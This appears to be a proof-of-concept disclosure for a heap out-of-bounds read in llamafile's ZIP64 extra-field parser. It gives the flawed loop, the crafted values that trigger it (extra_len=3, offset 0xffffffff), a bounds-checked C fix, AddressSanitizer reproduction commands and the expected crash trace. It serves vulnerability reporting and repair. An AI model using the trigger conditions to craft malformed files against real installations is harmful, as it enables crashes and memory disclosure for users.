Llamafile ZIP64 Extra Field OOB Read PoC
This PoC targets mozilla-ai/llamafile commit 6e7e1034ea20dce4b5c9c29d6858e8bb98b76339.
llamafile/zip.c parses ZIP64 extra fields with:
for (; p + ZIP_EXTRA_SIZE(p) <= pe; p += ZIP_EXTRA_SIZE(p))
ZIP_EXTRA_SIZE(p) reads ZIP_READ16(p + 2) before the loop checks that at least four bytes remain in the extra field. A central-directory entry with extra_len=3 and relative_offset=0xffffffff causes a heap-buffer-overflow read while resolving the .gguf entry offset.
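A bounds-checked way to walk the extra field, shown here as an added example (not code from llamafile or from this repository). The names `zip64_offset_checked`, `rd16`, `rd64` and the `skip` parameter are hypothetical; the sample buffers are constructed.

```c
#include <stddef.h>
#include <stdint.h>

#define EXTRA_HDR_SIZE  4       /* 2-byte header ID + 2-byte data size */
#define ZIP64_HEADER_ID 0x0001  /* ZIP64 extended information record */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

static uint64_t rd64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = v << 8 | p[i];
    return v;
}

/* Hypothetical helper: return the 64-bit local header offset stored in the
 * ZIP64 record of a central-directory extra field.
 * skip = ZIP64 data bytes that precede the offset (8 for each size field
 * that is 0xffffffff in the entry; 0 when only the offset is).
 * Returns 0 on success, -1 if the record is absent or malformed. */
int zip64_offset_checked(const uint8_t *extra, size_t extra_len,
                         size_t skip, uint64_t *out) {
    const uint8_t *p = extra, *pe = extra + extra_len;
    while ((size_t)(pe - p) >= EXTRA_HDR_SIZE) {  /* header is in bounds */
        size_t n = rd16(p + 2);                   /* safe: 4 bytes remain */
        if (n > (size_t)(pe - p) - EXTRA_HDR_SIZE)
            return -1;                            /* data runs past the end */
        if (rd16(p) == ZIP64_HEADER_ID) {
            if (skip > n || n - skip < 8)
                return -1;                        /* too short for an offset */
            *out = rd64(p + EXTRA_HDR_SIZE + skip);
            return 0;
        }
        p += EXTRA_HDR_SIZE + n;
    }
    return -1;  /* not found; also covers 1..3 trailing bytes (extra_len == 3) */
}

int main(void) {
    /* Constructed samples: a valid ZIP64 record and a 3-byte truncated one. */
    static const uint8_t ok[]  = {1,0, 8,0, 0,0,0,0, 1,0,0,0};
    static const uint8_t cut[] = {1,0, 8};
    uint64_t off = 0;
    return !(zip64_offset_checked(ok, sizeof ok, 0, &off) == 0 &&
             off == 0x100000000ull &&
             zip64_offset_checked(cut, sizeof cut, 0, &off) == -1);
}
```

The size is read only after the remaining length is known to cover the four-byte header, so a three-byte extra field is rejected without touching memory past the buffer.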
Reproduce locally from a fresh checkout:
python3 make_llamafile_zip64_extra_oob.py
cc -fsanitize=address -fno-omit-frame-pointer -g -O1 -I. -include stdint.h \
repro_llamafile_zip64_extra_oob.c llamafile/zip.c \
-o poc/repro_llamafile_zip64_extra_oob
ASAN_OPTIONS=abort_on_error=0:halt_on_error=1 \
./poc/repro_llamafile_zip64_extra_oob poc/llamafile-zip64-extra-oob.llamafile
Expected result:
about to parse ZIP64 extra field for x.gguf
ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 2
#0 ... in get_zip_cfile_offset llamafile/zip.c:54
The PoC file SHA256 is:
946c2667e00269e873d6346aaa76bd5700cef13fa08e560801758ef97d03c9db